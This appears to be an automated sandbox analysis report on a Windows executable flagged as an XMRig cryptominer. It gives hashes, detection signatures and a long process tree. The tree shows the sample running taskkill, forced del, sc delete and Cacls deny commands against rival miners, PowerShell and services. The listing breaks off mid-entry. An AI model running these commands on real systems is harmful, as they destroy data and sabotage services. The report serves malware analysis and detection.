Analysis
-
max time kernel
146s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
13-10-2022 07:00
General
-
Target
25b857d6f48515ea5d913223f29b92b5f02013cd891009af1b6ec1f04b06a43e.exe
-
Size
388KB
-
MD5
46e79da96551ae6319f7ed66ff8d63c8
-
SHA1
8290602f84440d3899401b0d51044021470b8a4d
-
SHA256
25b857d6f48515ea5d913223f29b92b5f02013cd891009af1b6ec1f04b06a43e
-
SHA512
94015a7433c21f43a2a8ee5788d453b72b1a44ae5b9c5b6a848e959a56a90c5c1ada32fe6be9ea42ded0b39d03fa12908b490210191a55c00ed9bb84161f434c
-
SSDEEP
6144:CxcIv8sDu4A+Oqp5UW9GtetZ5wZOTbNSubJyg+oiw4BHbz1qfOvlAkmQRFW:CxN5Duqzj9GsZGMn1yg+PwCHnVmQRFW
Score
10/10
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Kills process with taskkill 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\25b857d6f48515ea5d913223f29b92b5f02013cd891009af1b6ec1f04b06a43e.exe"C:\Users\Admin\AppData\Local\Temp\25b857d6f48515ea5d913223f29b92b5f02013cd891009af1b6ec1f04b06a43e.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im wscript.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wscript.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWD.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWD.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im exp1orer.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im exp1orer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im expl0rer.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im expl0rer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im mshta.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mshta.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im powershell.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powershell.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im powershell.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powershell.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im WmiPrvSER.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WmiPrvSER.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%\Help\WmiPrvSER.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\Help\WmiPrvSER.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Netsh_Help.dll2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Netsh_Help.dll3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%\SysWOW64\Netsh_Help.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SysWOW64\Netsh_Help.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im CGlobalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CGlobalan.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%\SystemCvlsa\CGlobalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemCvlsa\CGlobalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im CGlobalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CGlobalan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "CVIDIA AlibabaProtect ClobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "CVIDIA AlibabaProtect ClobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "CVIDIA AlibabaProtect ClobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "CVIDIA AlibabaProtect ClobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Gsmarn32.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn32.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft BnibabsProt\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\Gsmarn32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft BnibabsProt\Gsmarn32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt00\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft BnibabsProt00\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft BnibabsProt00\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%Microsoft BnibabsProt00\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Globalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Globalan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%\SystemSvlsa\Globalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemSvlsa\Globalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Globalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Globalan.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA SlibabaProtect GlobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA SlibabaProtect GlobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA SlibabaProtect GlobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA SlibabaProtect GlobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nsmart64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nsmart32.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nsmart32.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft AlibabaProt\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im NGlobalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NGlobalan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft AlibabaProt00\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft AlibabaProt00\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt00\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%Microsoft AlibabaProt00\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft AlibabaProt\Nsmart32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\Nsmart32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemNvlsa\NGlobalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%\SystemNvlsa\NGlobalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im NGlobalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NGlobalan.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA AlibabaProtect GlobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA AlibabaProtect GlobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA AlibabaProtect GlobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA AlibabaProtect GlobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NVDispla64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft NctiveStec00\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft NctiveStec00\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec00\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%Microsoft NctiveStec00\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nvdskrais.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nvdskrais.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemBols\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemBols\Nvdskrais.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%SystemBols\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%SystemBols\Nvdskrais.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NVDispla64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nvdskrais.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nvdskrais.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA windows dribs container"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA windows dribs container"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA windows dribs container"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA windows dribs container"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Diskraid.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Diskraid.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemBols\Diskraid.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%SystemBols\Diskraid.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Sqltem64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Diskraid.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Diskraid.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "dorporati windows dribe diskraid"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "dorporati windows dribe diskraid"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "dorporati windows dribe diskraid"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "dorporati windows dribe diskraid"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im AppVNice.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AppVNice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemBols\AppVNice.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%SystemBols\AppVNice.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Systen64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Systen64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SystelApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SystelApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SystelApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im AppVNice.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AppVNice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Norporati Windows AppVNice"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Norporati Windows AppVNice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Norporati Windows AppVNice"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Norporati Windows AppVNice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im taskger.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskger.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\taskger.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\taskger.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im taskmgzr.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgzr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\taskmgzr.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\taskmgzr.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\vget.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\vget.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im assm.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im assm.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls assm.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls assm.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls assm.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls assm.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SqlManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SqlManagement.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SqlManagement.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SqlManagement.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SqlManagement.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SqlManagement.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SystemManagement.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SystemManagement.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SystemManagement.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SystemManagement.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SystemManagement.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im msinfo.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msinfo.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls msinfo.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls msinfo.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls msinfo.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls msinfo.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im rundlls.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rundlls.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls rundlls.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls rundlls.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoy.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoy.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls rundlls.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls rundlls.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls conhoy.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls conhoy.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls OmdBase.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls OmdBase.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls OmdBase.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls OmdBase.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im OmdBase.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im OmdBase.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im System.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im System.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls System.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls System.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spoolys.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spoolys.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im OmdBase.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im OmdBase.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls System.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls System.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls conhoy.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls conhoy.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows DVD Maker"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows DVD Maker"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows DVD Maker"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows DVD Maker"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft Maker\OmdBase.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft Maker\OmdBase.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft Maker\OmdBase.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im GthUdTask.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies GthUdTask"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies GthUdTask"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies GthUdTask"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies GthUdTask"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft GthUdTask\GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft GthUdTask\GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im BthUdTask.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft GthUdTask\GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BthUdTask\BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies BthUdTask"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies BthUdTask"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies BthUdTask"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies BthUdTask"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft BthUdTask\BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft BthUdTask\BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SvidaPctb.exe2⤵
-
